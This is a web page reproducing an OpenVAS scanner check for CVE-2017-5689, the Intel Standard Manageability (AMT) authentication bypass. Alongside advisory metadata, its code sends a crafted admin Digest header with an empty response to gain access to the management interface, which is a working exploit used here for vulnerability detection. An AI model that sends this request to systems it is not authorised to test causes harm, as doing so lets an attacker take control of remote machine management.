Intel Standard Manageability Privilege Escalation Vulnerability

2017-05-0500:00:00

plugins.openvas.org

0.974 High

EPSS

Percentile

99.9%

JSON

This host is running Intel system with Intel
Standard Manageability and is prone to privilege escalation vulnerability.

###############################################################################
# OpenVAS Vulnerability Test
#
# Intel Standard Manageability Privilege Escalation Vulnerability
#
# Authors:
# Rinu Kuriakose <[email protected]>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

CPE = "cpe:/h:intel:intel_standard_manageability";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.810997");
  script_version("2020-05-08T11:13:33+0000");
  script_cve_id("CVE-2017-5689");
  script_bugtraq_id(98269);
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)");
  script_tag(name:"creation_date", value:"2017-05-05 15:39:37 +0530 (Fri, 05 May 2017)");
  script_tag(name:"qod_type", value:"exploit");
  script_name("Intel Standard Manageability Privilege Escalation Vulnerability");

  script_tag(name:"summary", value:"This host is running Intel system with Intel
  Standard Manageability and is prone to privilege escalation vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request
  and check if we are able to access the manageability features of this product.");

  script_tag(name:"insight", value:"The flaw exists due to mishandling of input
  in an unknown function.");

  script_tag(name:"impact", value:"Successful exploitation will allow an
  unprivileged attacker to gain control of the manageability features provided
  by these products.");

  script_tag(name:"affected", value:"Intel Standard Manageability firmware
  versions 6.x before 6.2.61.3535, 7.x before 7.1.91.3272, 8.x before 8.1.71.3608,
  9.0.x and 9.1.x before 9.1.41.3024, 9.5.x before 9.5.61.3012, 10.x before 10.0.55.3000,
  11.0.x before 11.0.25.3001, 11.5.x and 11.6.x before 11.6.27.3264.");

  script_tag(name:"solution", value:"Upgrade to Intel Standard Manageability
  firmware versions 6.2.61.3535 or 7.1.91.3272 or 8.1.71.3608 or 9.1.41.3024 or
  9.5.61.3012 or 10.0.55.3000 or 11.0.25.3001 or 11.6.27.3264 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_xref(name:"URL", value:"https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&amp;languageid=en-fr");
  script_xref(name:"URL", value:"https://arstechnica.com/security/2017/05/intel-patches-remote-code-execution-bug-that-lurked-in-cpus-for-10-years");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_intel_standard_manageability_detect.nasl");
  script_mandatory_keys("Intel/Standard/Manageability/version");
  script_require_ports("Services/www", 16992, 16993);

  script_xref(name:"URL", value:"https://downloadcenter.intel.com/download/26754");
  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

if(!appPort = get_app_port(cpe:CPE)){
  exit(0);
}

url = "/index.htm";
sndReq = http_get_req(port:appPort, url:url);
rcvRes = http_keepalive_send_recv(port:appPort, data:sndReq);

if(rcvRes && "Server: Intel(R) Standard Manageability" >< rcvRes)
{
  match = eregmatch(string:rcvRes, pattern:'"Digest.(.*)", nonce="(.*)",stale');
  if(match[1] && match[2])
  {
    digest = match[1];

    nonce = match[2];
  } else {
    exit(0);
  }

  asp_session = string('Digest username="admin", realm="Digest:', digest, '", nonce="',
                        nonce, '", uri="/index.htm", response="", qop=auth, nc=00000001,
                        cnonce="cb199a22ab5646c7"');

  sndReq = http_get_req(port:appPort, url:url, add_headers:make_array("Authorization", asp_session));
  rcvRes = http_keepalive_send_recv(port:appPort, data:sndReq);

  if(rcvRes =~ "^HTTP/1\.[01] 200" && "Server: Intel(R) Standard Manageability" >< rcvRes
             && ">Hardware Information" >< rcvRes && ">IP address" >< rcvRes && ">System ID" >< rcvRes
             && ">System<" >< rcvRes && ">Processor<" >< rcvRes && ">Memory<" >< rcvRes)
  {
    report = http_report_vuln_url(port:appPort, url: url);
    security_message(port: appPort, data: report);
    exit(0);
  }
}

exit(99);